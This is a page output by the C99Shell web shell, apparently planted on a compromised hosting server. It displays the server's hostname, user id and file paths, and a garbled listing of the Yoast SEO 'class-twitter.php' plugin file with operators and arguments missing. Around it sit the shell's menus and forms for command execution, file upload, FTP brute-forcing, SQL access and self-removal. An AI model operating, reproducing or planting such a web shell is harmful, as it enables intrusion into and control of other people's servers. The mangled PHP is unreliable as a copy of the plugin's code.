!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache. PHP/5.6.40-67+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux hosting1.erectacloud.it 5.4.0-182-generic #202-Ubuntu SMP Fri Apr 26 12:29:36 UTC
2024 x86_64
 

uid=5229(web473) gid=5117(client172) groups=5117(client172),5002(sshusers) 

Safe-mode: OFF (not secure)

/var/www/clients/client172/web473/web/OLD_WP/wp-content/plugins/wordpress-seo/frontend/   drwxr-xr-x
Free 180.49 GB of 490.84 GB (36.77%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     class-twitter.php (14.82 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * @package WPSEO\Frontend
 */

/**
 * This class handles the Twitter card functionality.
 *
 * @link https://dev.twitter.com/docs/cards
 */
class WPSEO_Twitter {

    
/**
     * @var    object    Instance of this class
     */
    
public static $instance;

    
/**
     * @var array Images
     */
    
private $images = array();

    
/**
     * @var array Images
     */
    
public $shown_images = array();

    
/**
     * @var array $options Holds the options for the Twitter Card functionality
     */
    
public $options;

    
/**
     * Will hold the Twitter card type being created
     *
     * @var string
     */
    
private $type;

    
/**
     * Class constructor
     */
    
public function __construct() {
        
$this->options WPSEO_Options::get_option'wpseo_social' );
        
$this->twitter();
    }

    
/**
     * Outputs the Twitter Card code on singular pages.
     */
    
public function twitter() {
        
wp_reset_query();

        
$this->type();
        
$this->description();
        
$this->title();
        
$this->site_twitter();
        
$this->image();
        if ( 
is_singular() ) {
            
$this->author();
        }

        
/**
         * Action: 'wpseo_twitter' - Hook to add all Yoast SEO Twitter output to so they're close together.
         */
        
do_action'wpseo_twitter' );
    }

    
/**
     * Display the Twitter card type.
     *
     * This defaults to summary but can be filtered using the <code>wpseo_twitter_card_type</code> filter.
     *
     * @link https://dev.twitter.com/docs/cards
     */
    
protected function type() {
        
$this->determine_card_type();
        
$this->sanitize_card_type();

        
$this->output_metatag'card'$this->type );
    }

    
/**
     * Determines the twitter card type for the current page
     */
    
private function determine_card_type() {
        
$this->type $this->options['twitter_card_type'];

        
// TODO this should be reworked to use summary_large_image for any fitting image R.
        
if ( is_singular() && has_shortcode$GLOBALS['post']->post_content'gallery' ) ) {

            
$this->images get_post_gallery_images();

            if ( 
count$this->images ) > ) {
                
$this->type 'summary_large_image';
            }
        }

        
/**
         * Filter: 'wpseo_twitter_card_type' - Allow changing the Twitter Card type as output in the Twitter card by Yoast SEO
         *
         * @api string $unsigned The type string
         */
        
$this->type apply_filters'wpseo_twitter_card_type'$this->type );
    }

    
/**
     * Determines whether the card type is of a type currently allowed by Twitter
     *
     * @link https://dev.twitter.com/cards/types
     */
    
private function sanitize_card_type() {
        if ( ! 
in_array$this->type, array(
            
'summary',
            
'summary_large_image',
            
'app',
            
'player',
        ) )
        ) {
            
$this->type 'summary';
        }
    }

    
/**
     * Output the metatag
     *
     * @param string $name    Tag name string.
     * @param string $value   Tag value string.
     * @param bool   $escaped Force escape flag.
     */
    
private function output_metatag$name$value$escaped false ) {

        
// Escape the value if not escaped.
        
if ( false === $escaped ) {
            
$value esc_attr$value );
        }

        
/**
         * Filter: 'wpseo_twitter_metatag_key' - Make the Twitter metatag key filterable
         *
         * @api string $key The Twitter metatag key
         */
        
$metatag_key apply_filters'wpseo_twitter_metatag_key''name' );

        
// Output meta.
        
echo '<meta 'esc_attr$metatag_key ), '="twitter:'esc_attr$name ), '" content="'$value'" />'"\n";
    }

    
/**
     * Displays the description for Twitter.
     *
     * Only used when OpenGraph is inactive.
     */
    
protected function description() {
        if ( 
is_singular() ) {
            
$meta_desc $this->single_description();
        }
        elseif ( 
WPSEO_Frontend::get_instance()->is_posts_page() ) {
            
$meta_desc $this->single_descriptionget_option'page_for_posts' ) );
        }
        elseif ( 
is_category() || is_tax() || is_tag() ) {
            
$meta_desc $this->taxonomy_description();
        }
        else {
            
$meta_desc $this->fallback_description();
        }

        
/**
         * Filter: 'wpseo_twitter_description' - Allow changing the Twitter description as output in the Twitter card by Yoast SEO
         *
         * @api string $twitter The description string
         */
        
$meta_desc apply_filters'wpseo_twitter_description'$meta_desc );
        if ( 
is_string$meta_desc ) && $meta_desc !== '' ) {
            
$this->output_metatag'description'$meta_desc );
        }
    }

    
/**
     * Returns the description for a singular page
     *
     * @param int $post_id Post ID.
     *
     * @return string
     */
    
private function single_description$post_id ) {
        
$meta_desc trimWPSEO_Meta::get_value'twitter-description'$post_id ) );

        if ( 
is_string$meta_desc ) && '' !== $meta_desc ) {
            return 
$meta_desc;
        }

        
$meta_desc $this->fallback_description();
        if ( 
is_string$meta_desc ) && '' !== $meta_desc ) {
            return 
$meta_desc;
        }

        return 
strip_tagsget_the_excerpt() );
    }


    
/**
     * Getting the description for the taxonomy
     *
     * @return bool|mixed|string
     */
    
private function taxonomy_description() {
        
$meta_desc WPSEO_Taxonomy_Meta::get_meta_without_term'twitter-description' );

        if ( ! 
is_string$meta_desc ) || $meta_desc === '' ) {
            
$meta_desc $this->fallback_description();
        }

        if ( 
is_string$meta_desc ) || $meta_desc !== '' ) {
            return 
$meta_desc;
        }

        return 
trimstrip_tagsterm_description() ) );

    }

    
/**
     * Returns a fallback description
     *
     * @return string
     */
    
private function fallback_description() {
        return 
trimWPSEO_Frontend::get_instance()->metadescfalse ) );
    }

    
/**
     * Displays the title for Twitter.
     *
     * Only used when OpenGraph is inactive.
     */
    
protected function title() {
        if ( 
is_singular() ) {
            
$title $this->single_title();
        }
        elseif ( 
WPSEO_Frontend::get_instance()->is_posts_page() ) {
            
$title $this->single_titleget_option'page_for_posts' ) );
        }
        elseif ( 
is_category() || is_tax() || is_tag() ) {
            
$title $this->taxonomy_title();
        }
        else {
            
$title $this->fallback_title();
        }

        
/**
         * Filter: 'wpseo_twitter_title' - Allow changing the Twitter title as output in the Twitter card by Yoast SEO
         *
         * @api string $twitter The title string
         */
        
$title apply_filters'wpseo_twitter_title'$title );
        if ( 
is_string$title ) && $title !== '' ) {
            
$this->output_metatag'title'$title );
        }
    }

    
/**
     * Returns the Twitter title for a single post
     *
     * @param int $post_id Post ID.
     *
     * @return string
     */
    
private function single_title$post_id ) {
        
$title WPSEO_Meta::get_value'twitter-title'$post_id );
        if ( ! 
is_string$title ) || $title === '' ) {
            return 
$this->fallback_title();
        }

        return 
$title;
    }

    
/**
     * Getting the title for the taxonomy
     *
     * @return bool|mixed|string
     */
    
private function taxonomy_title() {
        
$title WPSEO_Taxonomy_Meta::get_meta_without_term'twitter-title' );

        if ( ! 
is_string$title ) || $title === '' ) {
            return 
$this->fallback_title();
        }

        return 
$title;
    }

    
/**
     * Returns the Twitter title for any page
     *
     * @return string
     */
    
private function fallback_title() {
        return 
WPSEO_Frontend::get_instance()->title'' );
    }

    
/**
     * Displays the Twitter account for the site.
     */
    
protected function site_twitter() {
        
/**
         * Filter: 'wpseo_twitter_site' - Allow changing the Twitter site account as output in the Twitter card by Yoast SEO
         *
         * @api string $unsigned Twitter site account string
         */
        
$site apply_filters'wpseo_twitter_site'$this->options['twitter_site'] );
        
$site $this->get_twitter_id$site );

        if ( 
is_string$site ) && $site !== '' ) {
            
$this->output_metatag'site''@' $site );
        }
    }

    
/**
     * Checks if the given id is actually an id or a url and if url, distills the id from it.
     *
     * Solves issues with filters returning urls and theme's/other plugins also adding a user meta
     * twitter field which expects url rather than an id (which is what we expect).
     *
     * @param  string $id Twitter ID or url.
     *
     * @return string|bool Twitter ID or false if it failed to get a valid Twitter ID.
     */
    
private function get_twitter_id$id ) {
        if ( 
preg_match'`([A-Za-z0-9_]{1,25})$`'$id$match ) ) {
            return 
$match[1];
        }
        else {
            return 
false;
        }
    }

    
/**
     * Displays the image for Twitter
     *
     * Only used when OpenGraph is inactive or Summary Large Image card is chosen.
     */
    
protected function image() {

        if ( 
is_category() || is_tax() || is_tag() ) {
            
$this->taxonomy_image_output();
        }
        else {
            
$this->single_image_output();
        }

        if ( 
count$this->shown_images ) === && $this->options['og_default_image'] !== '' ) {
            
$this->image_output$this->options['og_default_image'] );
        }
    }

    
/**
     * Outputs the first image of a gallery.
     */
    
private function gallery_images_output() {

        
$this->image_outputreset$this->images ) );
    }

    
/**
     * @return bool
     */
    
private function taxonomy_image_output() {
        foreach ( array( 
'twitter-image''opengraph-image' ) as $tag ) {
            
$img WPSEO_Taxonomy_Meta::get_meta_without_term$tag );
            if ( 
$img !== '' ) {
                
$this->image_output$img );

                return 
true;
            }
        }

        return 
false;
    }

    
/**
     * Takes care of image output when we only need to display a single image.
     */
    
private function single_image_output() {
        if ( 
$this->homepage_image_output() ) {
            return;
        }
        elseif ( 
$this->posts_page_image_output() ) { // Posts page, which won't be caught by is_singular() below.
            
return;
        }

        if ( 
is_singular() ) {
            if ( 
$this->image_from_meta_values_output() ) {
                return;
            }

            
$post_id get_the_ID();

            if ( 
$this->image_of_attachment_page_output$post_id ) ) {
                return;
            }
            if ( 
$this->image_thumbnail_output() ) {
                return;
            }
            if ( 
count$this->images ) > ) {
                
$this->gallery_images_output();
                return;
            }
            if ( 
$this->image_from_content_output() ) {
                return;
            }
        }
    }

    
/**
     * Show the front page image
     *
     * @return bool
     */
    
private function homepage_image_output() {
        if ( 
is_front_page() ) {
            if ( 
$this->options['og_frontpage_image'] !== '' ) {
                
$this->image_output$this->options['og_frontpage_image'] );

                return 
true;
            }
        }

        return 
false;
    }

    
/**
     * Show the posts page image.
     *
     * @return bool
     */
    
private function posts_page_image_output() {

        if ( 
is_front_page() || ! is_home() ) {
            return 
false;
        }

        
$post_id get_option'page_for_posts' );

        if ( 
$this->image_from_meta_values_output$post_id ) ) {
            return 
true;
        }

        if ( 
$this->image_thumbnail_output$post_id ) ) {
            return 
true;
        }

        return 
false;
    }

    
/**
     * Outputs a Twitter image tag for a given image
     *
     * @param string  $img The source URL to the image.
     * @param boolean $tag Deprecated argument, previously used for gallery images.
     *
     * @return bool
     */
    
protected function image_output$img$tag false ) {

        if ( 
$tag ) {
            
_deprecated_argument__METHOD__'WPSEO 2.4' );
        }

        
/**
         * Filter: 'wpseo_twitter_image' - Allow changing the Twitter Card image
         *
         * @api string $img Image URL string
         */
        
$img apply_filters'wpseo_twitter_image'$img );

        if ( 
WPSEO_Utils::is_url_relative$img ) === true && $img[0] === '/' ) {
            
$parsed_url wp_parse_urlhome_url() );
            
$img        $parsed_url['scheme'] . '://' $parsed_url['host'] . $img;
        }

        
$escaped_img esc_url$img );

        if ( 
in_array$escaped_img$this->shown_images ) ) {
            return 
false;
        }

        if ( 
is_string$escaped_img ) && $escaped_img !== '' ) {
            
$this->output_metatag'image'$escaped_imgtrue );
            
array_push$this->shown_images$escaped_img );

            return 
true;
        }

        return 
false;
    }

    
/**
     * Retrieve images from the post meta values
     *
     * @param int $post_id Optional post ID to use.
     *
     * @return bool
     */
    
private function image_from_meta_values_output$post_id ) {
        foreach ( array( 
'twitter-image''opengraph-image' ) as $tag ) {
            
$img WPSEO_Meta::get_value$tag$post_id );
            if ( 
$img !== '' ) {
                
$this->image_output$img );

                return 
true;
            }
        }

        return 
false;
    }

    
/**
     * Retrieve an attachment page's attachment
     *
     * @param string $attachment_id The ID of the attachment for which to retrieve the image.
     *
     * @return bool
     */
    
private function image_of_attachment_page_output$attachment_id ) {
        if ( 
get_post_type$attachment_id ) === 'attachment' ) {
            
$mime_type get_post_mime_type$attachment_id );
            switch ( 
$mime_type ) {
                case 
'image/jpeg':
                case 
'image/png':
                case 
'image/gif':
                    
$this->image_outputwp_get_attachment_url$attachment_id ) );
                    return 
true;
            }
        }

        return 
false;
    }

    
/**
     * Retrieve the featured image
     *
     * @param int $post_id Optional post ID to use.
     *
     * @return bool
     */
    
private function image_thumbnail_output$post_id ) {

        if ( empty( 
$post_id ) ) {
            
$post_id get_the_ID();
        }

        if ( 
function_exists'has_post_thumbnail' ) && has_post_thumbnail$post_id ) ) {
            
/**
             * Filter: 'wpseo_twitter_image_size' - Allow changing the Twitter Card image size
             *
             * @api string $featured_img Image size string
             */
            
$featured_img wp_get_attachment_image_srcget_post_thumbnail_id$post_id ), apply_filters'wpseo_twitter_image_size''full' ) );

            if ( 
$featured_img ) {
                
$this->image_output$featured_img[0] );

                return 
true;
            }
        }

        return 
false;
    }

    
/**
     * Retrieve the image from the content
     *
     * @return bool
     */
    
private function image_from_content_output() {
        
/**
         * Filter: 'wpseo_pre_analysis_post_content' - Allow filtering the content before analysis
         *
         * @api string $post_content The Post content string
         *
         * @param object $post - The post object.
         */
        
global $post;
        
$content apply_filters'wpseo_pre_analysis_post_content'$post->post_content$post );

        if ( 
preg_match_all'`<img [^>]+>`'$content$matches ) ) {
            foreach ( 
$matches[0] as $img ) {
                if ( 
preg_match'`src=(["\'])(.*?)\1`'$img$match ) ) {
                    
$this->image_output$match[2] );

                    return 
true;
                }
            }
        }

        return 
false;
    }

    
/**
     * Displays the authors Twitter account.
     */
    
protected function author() {
        
$twitter ltrimtrimget_the_author_meta'twitter'get_post()->post_author ) ), '@' );
        
/**
         * Filter: 'wpseo_twitter_creator_account' - Allow changing the Twitter account as output in the Twitter card by Yoast SEO
         *
         * @api string $twitter The twitter account name string
         */
        
$twitter apply_filters'wpseo_twitter_creator_account'$twitter );
        
$twitter $this->get_twitter_id$twitter );

        if ( 
is_string$twitter ) && $twitter !== '' ) {
            
$this->output_metatag'creator''@' $twitter );
        }
        elseif ( 
$this->options['twitter_site'] !== '' ) {
            if ( 
is_string$this->options['twitter_site'] ) && $this->options['twitter_site'] !== '' ) {
                
$this->output_metatag'creator''@' $this->options['twitter_site'] );
            }
        }
    }

    
/**
     * Get the singleton instance of this class
     *
     * @return object
     */
    
public static function get_instance() {
        if ( ! ( 
self::$instance instanceof self ) ) {
            
self::$instance = new self();
        }

        return 
self::$instance;
    }

    
/**
     * Displays the domain tag for the site.
     *
     * @deprecated 3.0
     *
     * @codeCoverageIgnore
     */
    
protected function site_domain() {
        
_deprecated_function__METHOD__'WPSEO 3.0' );
    }
/* End of class */

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0108 ]--